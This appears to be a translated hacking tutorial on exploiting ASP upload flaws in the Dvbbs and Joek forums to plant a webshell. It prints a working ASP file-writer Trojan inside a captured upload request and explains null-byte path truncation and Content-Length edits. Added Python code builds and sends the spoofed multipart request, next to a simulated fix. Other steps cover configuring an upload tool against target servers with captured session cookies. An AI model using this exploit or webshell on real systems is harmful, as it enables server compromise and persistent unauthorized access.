Example analysis: attacking ASP upload vulnerabilities in practice, their extended use, and the related Trojan

Source: Internet
Author: User
Tags: ultraedit
"Upload vulnerability spoofing technique"

Many programs on the web have upload vulnerabilities, for example the "I Fly" whole-site program, Dynamic Mall, Autumn Leaf Mall and the Hui Letter news system. This article mainly explains how to attack an upload vulnerability and some extended uses of it. First we need to capture the data exchanged between the client and the server: prepare an ASP Trojan and try to upload it. The upload will of course fail; what we want is the data we submitted to the server along the way. WSockExpert is generally used to capture it. Because there is a lot of data, only the key parts are shown here:

POST /bbs/upfile.asp HTTP/1.1

....... (n more irrelevant header lines omitted)

Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidqqtdtatd=nldnnhpdjeehofnfbagpojkn
-----------------------------7d52191850242
Content-Disposition: form-data; name="FilePath"

uploadface
-----------------------------7d52191850242
Content-Disposition: form-data; name="Act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="File1"; filename="E:\Trojan\asp\shell.asp"
Content-Type: text/plain

<% Dim objFSO %>
<% Dim fdata %>
<% Dim objCountFile %>
<% On Error Resume Next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% If Trim(Request("syfdpath")) <> "" Then %>
<% fdata = Request("cyfddata") %>
<% Set objCountFile = objFSO.CreateTextFile(Request("syfdpath"), True) %>
<% objCountFile.Write fdata %>
<% If Err = 0 Then %>
<% Response.Write "<font color=red>success!</font>" %>
<% Else %>
<% Response.Write "<font color=red>failed!</font>" %>
<% End If %>
<% Err.Clear %>
<% End If %>
<% objCountFile.Close %>
<% Set objCountFile = Nothing %>
<% Set objFSO = Nothing %>
<% Response.Write "<form action="""" method=post>" %>
<% Response.Write "Save path <font color=red>e.g. D:\web\x.asp</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.Write "Located at: " %>
<% = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.Write "<br>" %>
<% Response.Write "Your content:" %>
<% Response.Write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.Write "<input type=submit value=Submit!!>" %>
<% Response.Write "</form>" %>

-----------------------------7d52191850242
Content-Disposition: form-data; name="FName"

E:\Trojan\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

upload
-----------------------------7d52191850242--

We now have the data that was submitted. Next it is modified to achieve the spoofing. The main changes are in a few places:

1. Content-Disposition: form-data; name="File1"; filename="E:\Trojan\asp\shell.asp"

   This is the file name of the uploaded part. Give it an extension the program allows (such as .jpg) so that the server's extension check passes; the content of the part stays the ASP Trojan.

2. Content-Disposition: form-data; name="FName", with the value E:\Trojan\asp\shell.asp

   Change it in the same way as the file name in File1.

3. The most important place is the value under Content-Disposition: form-data; name="FilePath". It must be changed from uploadface to uploadface\shell.asp followed by a null character (byte 0x00). The reason this works: the program uses FilePath as the directory, appends its own generated file name and the checked extension, and passes the result to the file-saving call; that string is cut off at the null byte before it reaches the file system, so the generated name and the .jpg extension are discarded and the file is written as uploadface\shell.asp. How do we add a null character after uploadface\shell.asp? UltraEdit's hex editing is a good way. Because the null character also occupies a position, first type a space after shell.asp, then switch to hex mode with Ctrl+H and change that space's 20 to 00.

4. One more place has to be modified: the line Content-Length: 1792, which is the number of bytes in the submitted body.

   If you change the value of FilePath, then 1792 must change as well. Each letter, digit or punctuation character counts as 1, and do not forget that the null byte at the end also counts as 1. Replacing uploadface (10 bytes) with uploadface\shell.asp plus the null (21 bytes) makes the body 11 bytes longer, so, if the other edits keep their length, the header becomes Content-Length: 1803. If the length is wrong the server reads too little or waits for bytes that never arrive, and the upload fails.
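To make step 3 concrete, here is an added example, not code from the article and not the forum's own upfile.asp (which the article does not reproduce). It simulates in Python the vulnerable pattern the text describes: the server trusts FilePath as the directory, appends its own generated name and the checked extension, and the file API underneath cuts the path at the first null byte. Beside it is a hardened version of the same step. The whitelist, the generated stem, the upload root and all function names are assumptions.

```python
"""Simulation of the NUL-byte path truncation behind the FilePath trick.

Added example, not code from the article; vulnerable_save_path is a
reconstruction of the pattern the article describes (client-chosen
directory + server-generated name + checked extension), not the real
upfile.asp.  Names, whitelist and the generated stem are assumptions.
"""
import os
import re

ALLOWED_EXT = {".jpg", ".gif"}                 # assumed whitelist of image types
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def ext_of(name: str) -> str:
    return os.path.splitext(name)[1].lower()


def os_truncate(path: bytes) -> bytes:
    """What the file API below the script sees: a C string ends at the first NUL."""
    return path.split(b"\x00", 1)[0]


def vulnerable_save_path(file_path_field: bytes, uploaded_name: str,
                         generated_stem: str = "20040101120000") -> bytes:
    """Vulnerable pattern: checks only the extension of the *uploaded* name,
    then builds <FilePath>/<generated>.<ext> from the client-supplied directory."""
    ext = ext_of(uploaded_name)
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")   # shell.asp is rejected, shell.jpg passes
    directory = file_path_field
    if not directory.endswith((b"/", b"\\")):
        directory += b"/"
    full_path = directory + generated_stem.encode() + ext.encode()
    return os_truncate(full_path)   # everything after the NUL is silently dropped


def hardened_save_path(upload_root: str, uploaded_name: str,
                       generated_stem: str = "20040101120000") -> str:
    """Fixed pattern: the client never picks the directory, NUL bytes are
    rejected, the extension must be whitelisted and the final absolute
    path is checked to lie directly under the server's upload root."""
    if "\x00" in uploaded_name or "\x00" in generated_stem:
        raise ValueError("NUL byte in file name")
    ext = ext_of(uploaded_name)
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    if not SAFE_STEM.match(generated_stem):
        raise ValueError("unsafe generated name")
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, generated_stem + ext))
    if os.path.dirname(dest) != root:
        raise ValueError("path escapes upload root")
    return dest


def attack_result() -> bytes:
    """The article's edit: FilePath = uploadface\\shell.asp + 0x00, file renamed to .jpg."""
    return vulnerable_save_path(b"uploadface\\shell.asp\x00", "shell.jpg")


if __name__ == "__main__":
    print("honest upload  :", vulnerable_save_path(b"uploadface", "photo.jpg"))
    print("spoofed upload :", attack_result())
    print("hardened       :", hardened_save_path("uploads", "shell.jpg"))
```

The honest upload lands at uploadface/20040101120000.jpg; the spoofed one lands at uploadface\shell.asp, because the generated name and extension sit after the null byte. The hardened function shows the three checks that close the hole: no client-chosen directory, no null bytes, and a final check that the resolved path is directly under the upload root.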

"Upload vulnerability in practice"


We first take the Dvbbs (Dongwang) forum, where this vulnerability originated, as the target. From the principle above you can see that the data has to be modified at upload time and the packet has to be intercepted, so many tools for this exist online. Here we use the Veteran's upload tool directly to simplify the tedious steps; only a few values need to be filled in. The tool's interface is shown in Figure 1:


Figure 1 Veterans Upload Tool interface

Let's use the tool:

In Action, enter the URL of the file with the upload vulnerability, for example http://target.net/bbs/upfile.asp. In uppath, the first text box is the name of the path field in the form (FilePath here), which is the upload path; the second is the name the backdoor should have once it is on the server, shell.asp. In Type, enter a file type the web program allows; the default jpg is generally fine, since most sites allow jpg images. In File, the first text box is the name of the file field in the form (File1 here); after it, fill in the path of the Trojan to upload on the local machine. In Cookies, fill in the cookie value captured with a packet-capture tool such as WSockExpert; it is best to register an account on the target system and capture the cookie of that session.

Taking our Dvbbs forum target as an example: Action: http://www.***.com/bbs/upfile.asp. uppath first box: filepath; second box: /shell.asp (you can also write /bbs/shell.asp, so that after a successful upload the shell lands in the /bbs directory). Type: a type the web program allows, jpg by default. File first box: File1; second box: E:\Trojan\asp\shell.asp (the path of the ASP Trojan on your own machine; you can also click the open-file icon behind the box and browse to the Trojan).

Cookies: no packet capture is needed here, because this upload does not check cookies at all; leave the box empty (filling it in here would only cause an error). Once everything is filled in, press the Submit button!
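The fields the tool asks for map one-to-one onto the multipart request from the first section. The following added example (not the article's code and not the Veteran's tool) builds that request in Python from the same inputs: the form field name for the path, the upload directory, the wanted shell name, the allowed type, the file field name, the local file name and an optional cookie. The field names, the boundary and the script path come from the capture on this page; the host name, the cookie and the shell contents are constructed placeholders. It computes Content-Length from the body instead of editing it by hand and also reports the delta that step 4 of the previous section asks for.

```python
"""Craft the spoofed multipart upload from the captured request.

Added example, not the article's code and not the Veteran's upload tool.
Field names, boundary and script path come from the capture on this page;
host, cookie and shell source are constructed placeholders.
"""
import http.client
import os
from typing import Optional

BOUNDARY = b"---------------------------7d52191850242"   # IE-style boundary from the capture


def part(name: bytes, value: bytes, filename: Optional[bytes] = None,
         content_type: Optional[bytes] = None) -> bytes:
    """One multipart/form-data part.  Values are raw bytes, so a NUL survives."""
    head = b"--" + BOUNDARY + b"\r\n"
    head += b'Content-Disposition: form-data; name="' + name + b'"'
    if filename is not None:
        head += b'; filename="' + filename + b'"'
    head += b"\r\n"
    if content_type is not None:
        head += b"Content-Type: " + content_type + b"\r\n"
    return head + b"\r\n" + value + b"\r\n"


def build_body(path_field: bytes, upload_dir: bytes, shell_name: bytes, allowed_ext: bytes,
               file_field: bytes, local_name: bytes, shell_source: bytes) -> bytes:
    """The article's edit done programmatically: the path field carries the
    directory, the wanted shell name and a trailing NUL; the file name and
    FName get the allowed extension so the extension check passes."""
    spoofed_path = upload_dir + b"\\" + shell_name + b"\x00"
    fake_name = os.path.splitext(local_name)[0] + b"." + allowed_ext   # shell.asp -> shell.jpg
    body = part(path_field, spoofed_path)
    body += part(b"Act", b"upload")
    body += part(file_field, shell_source, filename=fake_name, content_type=b"text/plain")
    body += part(b"FName", fake_name)
    body += part(b"Submit", b"upload")
    return body + b"--" + BOUNDARY + b"--\r\n"


def build_request(host: bytes, script: bytes, body: bytes,
                  cookie: Optional[bytes] = None) -> bytes:
    """Raw request bytes.  Content-Length is computed, never typed by hand."""
    lines = [b"POST " + script + b" HTTP/1.1",
             b"Host: " + host,
             b"Content-Type: multipart/form-data; boundary=" + BOUNDARY,
             b"Content-Length: " + str(len(body)).encode(),
             b"Connection: close"]
    if cookie:
        lines.append(b"Cookie: " + cookie)
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


def fields(body: bytes) -> dict:
    """Parse a body back into {name: raw value}, to check what is really sent."""
    out = {}
    for chunk in body.split(b"--" + BOUNDARY)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        name = head.split(b'name="', 1)[1].split(b'"', 1)[0]
        out[name] = value[:-2]             # strip the CRLF that ends the part
    return out


def content_length_delta(original_value: bytes, spoofed_value: bytes) -> int:
    """Growth of Content-Length when a field is edited in place: every byte
    counts, the trailing NUL included."""
    return len(spoofed_value) - len(original_value)


def send(host: str, script: str, body: bytes, cookie: Optional[str] = None) -> int:
    """Send the body with http.client and return the HTTP status (not run in the demo)."""
    headers = {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY.decode(),
               "Content-Length": str(len(body))}
    if cookie:
        headers["Cookie"] = cookie
    conn = http.client.HTTPConnection(host, timeout=10)
    try:
        conn.request("POST", script, body=body, headers=headers)
        return conn.getresponse().status
    finally:
        conn.close()


if __name__ == "__main__":
    body = build_body(b"FilePath", b"uploadface", b"shell.asp", b"jpg",
                      b"File1", b"shell.asp", b'<% Response.Write "placeholder" %>')
    req = build_request(b"target.net", b"/bbs/upfile.asp", body)
    print(req.decode("latin-1").replace("\x00", "<NUL>"))
    print("Content-Length grows by",
          content_length_delta(b"uploadface", b"uploadface\\shell.asp\x00"))
```

Everything is handled as bytes on purpose: a text-mode string builder or a browser form will either drop the NUL or percent-encode it, and then the truncation never happens on the server. The fields() parser lets you confirm the NUL is inside the FilePath value before anything is sent.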


Figure 2 Upload Success Tips

After clicking the Submit button it is best to check the result with a browser, because the tool can also report a success wrongly. Next we open the uploaded file in the browser.


Figure 3 can see that the upload has been successful

The next step is to use this file-writer to write a more powerful Trojan and work from there; that is not covered further here.

"Extended use of upload vulnerabilities in practice"


Not only Dvbbs has an upload vulnerability; many programs on the web have the same flaw. Once the principle of upload vulnerabilities is understood, an expert can apply it freely, depending on the program's code. Below we take the Joek forum as an example to extend the use of the upload flaw.
First register a normal user and log in, then find the address of the upload page: http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_ Word and view its source code, as follows:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Once you have seen the source code, you know how to fill in the Veteran's upload tool.
In Action enter http://192.168.1.3/3/upload.asp?action=upfile. In uppath, the first text box is Up_name and the second is the name the shell should have after upload, shell.asp. In File, the first text box is File_name1 and the second is the Trojan file on the local machine. In Cookies, fill in the cookie value obtained by packet capture; this time it must be filled in with the cookie information captured by WSockExpert, because this program checks it: it is what verifies the logged-in user. As shown in the figure:


Figure 4 Set as Figure

With everything set, click the Submit button. When the tool reports a successful upload, open the browser to confirm that it really succeeded, as shown:


Figure 5 Upload success

At this point we have obtained a webshell; it is that simple. What matters is flexible thinking, and being good at finding out whether a system has an upload vulnerability. As for what you can do after obtaining the webshell, that depends on the server's security configuration and your own skill, and is not discussed here.
